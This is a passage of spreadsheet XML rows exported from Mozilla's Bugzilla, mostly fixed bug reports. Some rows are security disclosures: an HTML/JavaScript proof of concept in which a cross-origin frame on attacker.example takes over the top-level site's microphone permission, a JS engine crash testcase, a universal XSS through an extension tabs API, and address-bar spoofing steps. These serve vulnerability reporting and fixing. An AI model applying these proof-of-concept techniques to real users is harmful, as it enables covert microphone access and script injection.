          <t>FIXED</t>
        </is>
      </c>
      <c r="P5025" t="inlineStr"/>
      <c r="Q5025" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5025" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5025" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5025" t="n">
        <v>1</v>
      </c>
      <c r="U5025" t="n">
        <v>0</v>
      </c>
      <c r="V5025" t="n">
        <v>4</v>
      </c>
      <c r="W5025" t="inlineStr">
        <is>
          <t>If you run "make dockertest" and then try "ctrl-c" expecting it to kill the process and get you back to a prompt, you'd be surprised to discover that your "ctrl-c" is completely ignored and you're forced to sit through the entire test suite.
This bug covers figuring out what's going on and fixing it.</t>
        </is>
      </c>
      <c r="X5025" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5026">
      <c r="A5026" t="n">
        <v>428414</v>
      </c>
      <c r="B5026" t="inlineStr">
        <is>
          <t>2008-04-10 15:37:39 -0700</t>
        </is>
      </c>
      <c r="C5026" t="inlineStr">
        <is>
          <t>Need to contact UoW to include CGI for Perl 5.10</t>
        </is>
      </c>
      <c r="D5026" t="inlineStr">
        <is>
          <t>2008-04-11 13:10:10 -0700</t>
        </is>
      </c>
      <c r="E5026" t="n">
        <v>1</v>
      </c>
      <c r="F5026" t="n">
        <v>1</v>
      </c>
      <c r="G5026" t="n">
        <v>4</v>
      </c>
      <c r="H5026" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5026" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5026" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K5026" t="inlineStr">
        <is>
          <t>3.1.3</t>
        </is>
      </c>
      <c r="L5026" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5026" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5026" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5026" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5026" t="inlineStr"/>
      <c r="Q5026" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5026" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5026" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T5026" t="n">
        <v>1</v>
      </c>
      <c r="U5026" t="n">
        <v>0</v>
      </c>
      <c r="V5026" t="n">
        <v>8</v>
      </c>
      <c r="W5026" t="inlineStr">
        <is>
          <t>This is a regression of bug 416382, which for good reasons, made us require CGI 3.33. Neither ActiveState's PPM repository nor the one of the University of Winnipeg we recommend via Bugzilla/Install/Requirements.pm offers this version of CGI, though.
What can be done about this? Perhaps one of the following:
 - blacklist Perl 5.10, at least on Windows
 - require another repository (Frédéric pointed me to one offering CGI 3.33)
 - Other ideas?</t>
        </is>
      </c>
      <c r="X5026" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5027">
      <c r="A5027" t="n">
        <v>1443541</v>
      </c>
      <c r="B5027" t="inlineStr">
        <is>
          <t>2018-03-06 08:31:05 -0800</t>
        </is>
      </c>
      <c r="C5027" t="inlineStr">
        <is>
          <t>Page is not loading in Reader Mode in Private Browsing after following the STR</t>
        </is>
      </c>
      <c r="D5027" t="inlineStr">
        <is>
          <t>2018-03-09 07:24:40 -0800</t>
        </is>
      </c>
      <c r="E5027" t="n">
        <v>1</v>
      </c>
      <c r="F5027" t="n">
        <v>1</v>
      </c>
      <c r="G5027" t="n">
        <v>2</v>
      </c>
      <c r="H5027" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5027" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5027" t="inlineStr">
        <is>
          <t>Reader View</t>
        </is>
      </c>
      <c r="K5027" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5027" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5027" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5027" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5027" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5027" t="inlineStr"/>
      <c r="Q5027" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5027" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5027" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5027" t="n">
        <v>1</v>
      </c>
      <c r="U5027" t="n">
        <v>0</v>
      </c>
      <c r="V5027" t="n">
        <v>5</v>
      </c>
      <c r="W5027" t="inlineStr">
        <is>
          <t>Build: 11.0(9379)
Device: iPad Air 2
iOS: 11.2.5
Steps to reproduce:
1. Go to http://www.bbc.com/news/world-australia-43299283 in normal browsing
2. Tap on the Reader View icon
3. Add the page to the Reading List
4. Open a New Private Tab
5. Go to the Reading List and open the article previously saved
Actual results:
- The page is not loading in Reader Mode. (The page could not be displayed in Reader View)
Note:
- This issue was also reproduced on iPhone and on other pages (wikipedia.com, news.google.com)
See a video here: 
- https://www.youtube.com/watch?v=BYPvTRjCjsU</t>
        </is>
      </c>
      <c r="X5027" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5028">
      <c r="A5028" t="n">
        <v>1755081</v>
      </c>
      <c r="B5028" t="inlineStr">
        <is>
          <t>2022-02-11 14:16:37 -0800</t>
        </is>
      </c>
      <c r="C5028" t="inlineStr">
        <is>
          <t>Cross-origin embeds/objects can obtain permissions of the top-level origin</t>
        </is>
      </c>
      <c r="D5028" t="inlineStr">
        <is>
          <t>2024-10-02 14:59:33 -0700</t>
        </is>
      </c>
      <c r="E5028" t="n">
        <v>1</v>
      </c>
      <c r="F5028" t="n">
        <v>1</v>
      </c>
      <c r="G5028" t="n">
        <v>3</v>
      </c>
      <c r="H5028" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5028" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5028" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5028" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5028" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5028" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5028" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5028" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5028" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main100+][adv-esr91.9+]</t>
        </is>
      </c>
      <c r="Q5028" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5028" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S5028" t="inlineStr">
        <is>
          <t>101 Branch</t>
        </is>
      </c>
      <c r="T5028" t="n">
        <v>1</v>
      </c>
      <c r="U5028" t="n">
        <v>0</v>
      </c>
      <c r="V5028" t="n">
        <v>43</v>
      </c>
      <c r="W5028" t="inlineStr">
        <is>
          <t>Documents in nested cross-origin browsing contexts can obtain permissions granted to the top-level origin. This could e.g. be a 3rd-party `&lt;iframe&gt;` accessing the webcam after permission had been given to the parent site, or prompting for geolocation access in the parent's name.
The attack is based on exploiting faulty `FeaturePolicy` inheritance by inserting a non-`&lt;iframe&gt;` embedder (e.g. `&lt;embed&gt;`) in the ancestor chain.
### Attack scenario
- The user has granted a permanent microphone permission to `voicechat.example`.
- `voicechat.example` embeds a cross-origin advertisement via `&lt;iframe src="https://advertiser.example"&gt;`.
- Once loaded, `advertiser.example` can access the microphone without user interaction.
If permission had not been granted yet, `advertiser.example` may also prompt for it. The dialog will then still appear as a request by `voicechat.example` and not the attacker. (It's by design that the prompt always requests as the top-level origin.)
### Proof of concept
(These are identical to the attached `poc.zip`.)
`https://site.example/site.html`:
    &lt;iframe src="https://attacker.example/attacker_parent.html"&gt;&lt;/iframe&gt;
`https://attacker.example/attacker_parent.html`:
    &lt;embed src="attacker_child.html"&gt;&lt;/embed&gt;
`https://attacker.example/attacker_child.html`:
    &lt;button id="ask"&gt;access microphone&lt;/button&gt;
    &lt;div id="info"&gt;&lt;/div&gt;
    &lt;script&gt;
      ask.onclick = async function() {
        const stream = await navigator.mediaDevices.getUserMedia({audio: true});
        info.textContent = `origin ${origin} got ${stream}`;
      }
    &lt;/script&gt;
A click on "access microphone" will give `attacker.example` access based on the current permissions for `site.example`. However, it should have been neither promted for nor granted, because the request originates from a cross-origin frame without special permissions.
I'll follow up with more details.</t>
        </is>
      </c>
      <c r="X5028" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5029">
      <c r="A5029" t="n">
        <v>12996</v>
      </c>
      <c r="B5029" t="inlineStr">
        <is>
          <t>1999-09-01 18:04:18 -0700</t>
        </is>
      </c>
      <c r="C5029" t="inlineStr">
        <is>
          <t>Tasks menu gets corrupted</t>
        </is>
      </c>
      <c r="D5029" t="inlineStr">
        <is>
          <t>2004-11-23 18:54:58 -0800</t>
        </is>
      </c>
      <c r="E5029" t="n">
        <v>1</v>
      </c>
      <c r="F5029" t="n">
        <v>1</v>
      </c>
      <c r="G5029" t="n">
        <v>2</v>
      </c>
      <c r="H5029" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5029" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5029" t="inlineStr">
        <is>
          <t>UI Design</t>
        </is>
      </c>
      <c r="K5029" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5029" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5029" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5029" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5029" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5029" t="inlineStr"/>
      <c r="Q5029" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5029" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5029" t="inlineStr">
        <is>
          <t>M11</t>
        </is>
      </c>
      <c r="T5029" t="n">
        <v>1</v>
      </c>
      <c r="U5029" t="n">
        <v>0</v>
      </c>
      <c r="V5029" t="n">
        <v>12</v>
      </c>
      <c r="W5029" t="inlineStr">
        <is>
          <t>Tested on Mac with today's debug build (09/01/99)
- launch apprunner
- open an editor window
- close the editor window
==&gt; look at the Tasks menu: it displays an 'a' at the bottom
==&gt; repeat the operation: the Tasks menu displays an additionnal 'a' for each
Editor window that has been opened</t>
        </is>
      </c>
      <c r="X5029" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5030">
      <c r="A5030" t="n">
        <v>477459</v>
      </c>
      <c r="B5030" t="inlineStr">
        <is>
          <t>2009-02-08 02:48:21 -0800</t>
        </is>
      </c>
      <c r="C5030" t="inlineStr">
        <is>
          <t>buglist.cgi crashes for logged out users if the "Reporter" column is displayed</t>
        </is>
      </c>
      <c r="D5030" t="inlineStr">
        <is>
          <t>2009-02-20 06:13:31 -0800</t>
        </is>
      </c>
      <c r="E5030" t="n">
        <v>1</v>
      </c>
      <c r="F5030" t="n">
        <v>1</v>
      </c>
      <c r="G5030" t="n">
        <v>4</v>
      </c>
      <c r="H5030" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5030" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5030" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K5030" t="inlineStr">
        <is>
          <t>3.3.2</t>
        </is>
      </c>
      <c r="L5030" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5030" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5030" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5030" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5030" t="inlineStr"/>
      <c r="Q5030" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5030" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5030" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T5030" t="n">
        <v>1</v>
      </c>
      <c r="U5030" t="n">
        <v>0</v>
      </c>
      <c r="V5030" t="n">
        <v>7</v>
      </c>
      <c r="W5030" t="inlineStr">
        <is>
          <t>On landfill, if the Reporter column is displayed while I'm logged out, buglist.cgi crashes:
http://landfill.bugzilla.org/bugzilla-tip-pg/buglist.cgi?quicksearch=%40myk
DBD::Pg::st execute failed: ERROR:  column "map_reporter.login_name" must appear in the GROUP BY clause or be used in an aggregate function
 [for Statement "SELECT bugs.bug_id, bugs.bug_severity, bugs.priority, bugs.bug_status, bugs.resolution, SUBSTRING(map_assigned_to.login_name FROM 1 FOR POSITION('@' IN map_assigned_to.login_name) - 1), bugs.bug_status, bugs.resolution, map_products.name, bugs.short_desc, SUBSTRING(map_reporter.login_name FROM 1 FOR POSITION('@' IN map_reporter.login_name) - 1), map_assigned_to.login_name FROM bugs  INNER JOIN profiles AS map_assigned_to ON (bugs.assigned_to = map_assigned_to.userid) INNER JOIN profiles AS map_reporter ON (bugs.reporter = map_reporter.userid) INNER JOIN products AS map_products ON (bugs.product_id = map_products.id) LEFT JOIN bug_status ON (bug_status.value = bugs.bug_status) LEFT JOIN priority ON (priority.value = bugs.priority) LEFT JOIN bug_group_map  ON bug_group_map.bug_id = bugs.bug_id  WHERE (( bugs.bug_status IN ('REOPENED','NEW','ASSIGNED','UNCONFIRMED') )) AND ((bugs.assigned_to IN (SELECT userid FROM profiles WHERE POSITION(LOWER('myk') IN LOWER(profiles.login_name)) &gt; 0))) AND bugs.creation_ts IS NOT NULL AND ((bug_group_map.group_id IS NULL)) GROUP BY bugs.bug_id, bugs.bug_severity, bugs.priority, bugs.bug_status, bugs.resolution, map_products.name, bugs.short_desc, map_assigned_to.login_name, bug_status.sortkey, bug_status.value, priority.sortkey, priority.value ORDER BY bug_status.sortkey,bug_status.value,priority.sortkey,priority.value,map_assigned_to.login_name,bugs.bug_id"] at /var/www/html/bugzilla-tip-pg/buglist.cgi line 1077
On my test installation, the error message mentions "map_assigned_to.login_name". I guess one would get the same error message if the QA contact column was displayed.
Also, even if you don't display the Reporter column, you still get the following error message (appears only every other time):
"The custom sort order specified in your cookie contains an invalid column name map_assigned_to.login_name. The cookie has been cleared." This error is only displayed for logged out users. So I'm pretty sure that's a regression due to bug 219021.</t>
        </is>
      </c>
      <c r="X5030" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5031">
      <c r="A5031" t="n">
        <v>639343</v>
      </c>
      <c r="B5031" t="inlineStr">
        <is>
          <t>2011-03-06 09:59:49 -0800</t>
        </is>
      </c>
      <c r="C5031" t="inlineStr">
        <is>
          <t>TM: Crash [@ js::DefaultValue] or "Assertion failure: obj,"</t>
        </is>
      </c>
      <c r="D5031" t="inlineStr">
        <is>
          <t>2012-03-23 17:32:20 -0700</t>
        </is>
      </c>
      <c r="E5031" t="n">
        <v>1</v>
      </c>
      <c r="F5031" t="n">
        <v>1</v>
      </c>
      <c r="G5031" t="n">
        <v>3</v>
      </c>
      <c r="H5031" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5031" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5031" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5031" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5031" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5031" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5031" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5031" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5031" t="inlineStr">
        <is>
          <t>[sg:critical?][ccbr][fixed-in-tracemonkey]</t>
        </is>
      </c>
      <c r="Q5031" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5031" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5031" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5031" t="n">
        <v>1</v>
      </c>
      <c r="U5031" t="n">
        <v>0</v>
      </c>
      <c r="V5031" t="n">
        <v>26</v>
      </c>
      <c r="W5031" t="inlineStr">
        <is>
          <t>Created attachment 517282
stacks
(Array.prototype.__proto__)[0] = /a/
function f() {
  eval("\
    (function(){\
      for(t in [,0,0,0,0,0,0,0,0,0]) {\
        a = new Int8Array;\
        print(a[0])\
      }\
    })\
  ")()
}
f()
crashes js opt shell on TM changeset ae418087b4da with -j at js::DefaultValue and asserts js debug shell with -j at Assertion failure: obj
Seems to be a null deref but locking s-s just-in-case.
This was found using a combination of jsfunfuzz and jandem's method fuzzer.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   51690:c497469955fa
user:        Vladimir Vukicevic
date:        Fri Aug 27 12:06:34 2010 -0400
summary:     b=590672; treat ArrayBuffer() and SomeArrayType() as (0); r=shaver</t>
        </is>
      </c>
      <c r="X5031" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5032">
      <c r="A5032" t="n">
        <v>1628288</v>
      </c>
      <c r="B5032" t="inlineStr">
        <is>
          <t>2020-04-08 05:07:02 -0700</t>
        </is>
      </c>
      <c r="C5032" t="inlineStr">
        <is>
          <t>Location bar site information is misleading when selecting Top Site with keyboard and then cancelling</t>
        </is>
      </c>
      <c r="D5032" t="inlineStr">
        <is>
          <t>2020-09-01 02:14:03 -0700</t>
        </is>
      </c>
      <c r="E5032" t="n">
        <v>1</v>
      </c>
      <c r="F5032" t="n">
        <v>1</v>
      </c>
      <c r="G5032" t="n">
        <v>2</v>
      </c>
      <c r="H5032" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5032" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5032" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5032" t="inlineStr">
        <is>
          <t>75 Branch</t>
        </is>
      </c>
      <c r="L5032" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5032" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5032" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5032" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5032" t="inlineStr">
        <is>
          <t>[adv-main76+]</t>
        </is>
      </c>
      <c r="Q5032" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5032" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5032" t="inlineStr">
        <is>
          <t>Firefox 77</t>
        </is>
      </c>
      <c r="T5032" t="n">
        <v>1</v>
      </c>
      <c r="U5032" t="n">
        <v>0</v>
      </c>
      <c r="V5032" t="n">
        <v>14</v>
      </c>
      <c r="W5032" t="inlineStr">
        <is>
          <t>Created attachment 9139126
Location bar appears to be on reddit.com despite being on mozilla.org
STR:
1. Go to https://mozilla.org.
2. Focus location bar.
3. Use arrow keys to highlight reddit.com top site.
4. Press escape key or click elsewhere without selecting.
Expected:
The location bar shows the current site or does not show site information icons.
Actual:
The highlighted reddit.com URL persists as if it is the current site with the padlock and site permissions of mozilla.org, making it visually indistinguishable from being on the site itself.
This could be exploited by someone with physical access to a computer to do phishing attacks.</t>
        </is>
      </c>
      <c r="X5032" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5033">
      <c r="A5033" t="n">
        <v>479931</v>
      </c>
      <c r="B5033" t="inlineStr">
        <is>
          <t>2009-02-23 21:15:32 -0800</t>
        </is>
      </c>
      <c r="C5033" t="inlineStr">
        <is>
          <t>Crash [@ nsTreeContentView::InsertRow] with &lt;xul:tree&gt; and &lt;option&gt;</t>
        </is>
      </c>
      <c r="D5033" t="inlineStr">
        <is>
          <t>2018-04-30 13:11:59 -0700</t>
        </is>
      </c>
      <c r="E5033" t="n">
        <v>1</v>
      </c>
      <c r="F5033" t="n">
        <v>1</v>
      </c>
      <c r="G5033" t="n">
        <v>3</v>
      </c>
      <c r="H5033" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5033" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5033" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K5033" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5033" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5033" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5033" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5033" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5033" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5033" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5033" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5033" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T5033" t="n">
        <v>1</v>
      </c>
      <c r="U5033" t="n">
        <v>0</v>
      </c>
      <c r="V5033" t="n">
        <v>25</v>
      </c>
      <c r="W5033" t="inlineStr">
        <is>
          <t>Created attachment 363834
testcase (crashes Firefox when loaded)
Firefox crashes trying to do something with memory at 0x1c6ffffc.</t>
        </is>
      </c>
      <c r="X5033" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5034">
      <c r="A5034" t="n">
        <v>1206283</v>
      </c>
      <c r="B5034" t="inlineStr">
        <is>
          <t>2015-09-18 15:28:47 -0700</t>
        </is>
      </c>
      <c r="C5034" t="inlineStr">
        <is>
          <t>ASan: heap-buffer-overflow in sec_port_ucs2_utf8_conversion_function()</t>
        </is>
      </c>
      <c r="D5034" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:30 -0800</t>
        </is>
      </c>
      <c r="E5034" t="n">
        <v>1</v>
      </c>
      <c r="F5034" t="n">
        <v>1</v>
      </c>
      <c r="G5034" t="n">
        <v>3</v>
      </c>
      <c r="H5034" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5034" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5034" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5034" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L5034" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5034" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5034" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5034" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5034" t="inlineStr">
        <is>
          <t>[adv-main47+]</t>
        </is>
      </c>
      <c r="Q5034" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5034" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5034" t="inlineStr">
        <is>
          <t>3.23</t>
        </is>
      </c>
      <c r="T5034" t="n">
        <v>1</v>
      </c>
      <c r="U5034" t="n">
        <v>0</v>
      </c>
      <c r="V5034" t="n">
        <v>35</v>
      </c>
      <c r="W5034" t="inlineStr">
        <is>
          <t>Created attachment 8663170
call_stack.txt
I found this with a new fuzzing harness I am working on. I will share it when it is complete.</t>
        </is>
      </c>
      <c r="X5034" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5035">
      <c r="A5035" t="n">
        <v>1227462</v>
      </c>
      <c r="B5035" t="inlineStr">
        <is>
          <t>2015-11-24 02:44:59 -0800</t>
        </is>
      </c>
      <c r="C5035" t="inlineStr">
        <is>
          <t>chrome.tabs.update/create APIs should call checkLoadURI with DISALLOW_INHERIT_PRINCIPAL</t>
        </is>
      </c>
      <c r="D5035" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:21 -0700</t>
        </is>
      </c>
      <c r="E5035" t="n">
        <v>1</v>
      </c>
      <c r="F5035" t="n">
        <v>1</v>
      </c>
      <c r="G5035" t="n">
        <v>3</v>
      </c>
      <c r="H5035" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5035" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J5035" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K5035" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5035" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5035" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5035" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5035" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5035" t="inlineStr">
        <is>
          <t>[good first bug][tabs] triaged  [adv-main46+]</t>
        </is>
      </c>
      <c r="Q5035" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5035" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5035" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T5035" t="n">
        <v>1</v>
      </c>
      <c r="U5035" t="n">
        <v>1</v>
      </c>
      <c r="V5035" t="n">
        <v>92</v>
      </c>
      <c r="W5035" t="inlineStr">
        <is>
          <t>Created attachment 8691313
uxss.xpi
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Steps to reproduce:
The 'chrome.tabs.update' API allows to navigate tabs to javascript: URLs without any permissions. It can be used for universal XSS attacks to all documents that are opening. It affects not only to ordinary websites but also other extensions. If an other extension'd page is shown in a tab, then script can be  injected from the malicious extension with no permissions, i.e., obtain the target extension's privilege.
Attached is a sample extension that can reproduce the issue.
Actual results:
1. Open arbitrary web sites and extension's page on tabs
2. Click the button of this extension
3. Alert dialog with their current document.location is shown on each tab
Expected results:
The 'chrome.tabs.update' should prohibits navigation to harmful URLs e.g., javascript: and data:. Chrome do so.</t>
        </is>
      </c>
      <c r="X5035" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5036">
      <c r="A5036" t="n">
        <v>1343505</v>
      </c>
      <c r="B5036" t="inlineStr">
        <is>
          <t>2017-03-01 04:07:45 -0800</t>
        </is>
      </c>
      <c r="C5036" t="inlineStr">
        <is>
          <t>Firefox crashed when encounter immature HTTP/2 server send DATA frame padding length large than payload length</t>
        </is>
      </c>
      <c r="D5036" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:47 -0700</t>
        </is>
      </c>
      <c r="E5036" t="n">
        <v>1</v>
      </c>
      <c r="F5036" t="n">
        <v>1</v>
      </c>
      <c r="G5036" t="n">
        <v>3</v>
      </c>
      <c r="H5036" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5036" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5036" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K5036" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L5036" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5036" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5036" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5036" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5036" t="inlineStr">
        <is>
          <t>[necko-active][spdy][adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q5036" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5036" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5036" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5036" t="n">
        <v>1</v>
      </c>
      <c r="U5036" t="n">
        <v>0</v>
      </c>
      <c r="V5036" t="n">
        <v>41</v>
      </c>
      <c r="W5036" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
We had a test tool that focus on HTTP/2 client/browser testing.
You could reference https://github.com/summerwind/h2spec/pull/74#issuecomment-283273210
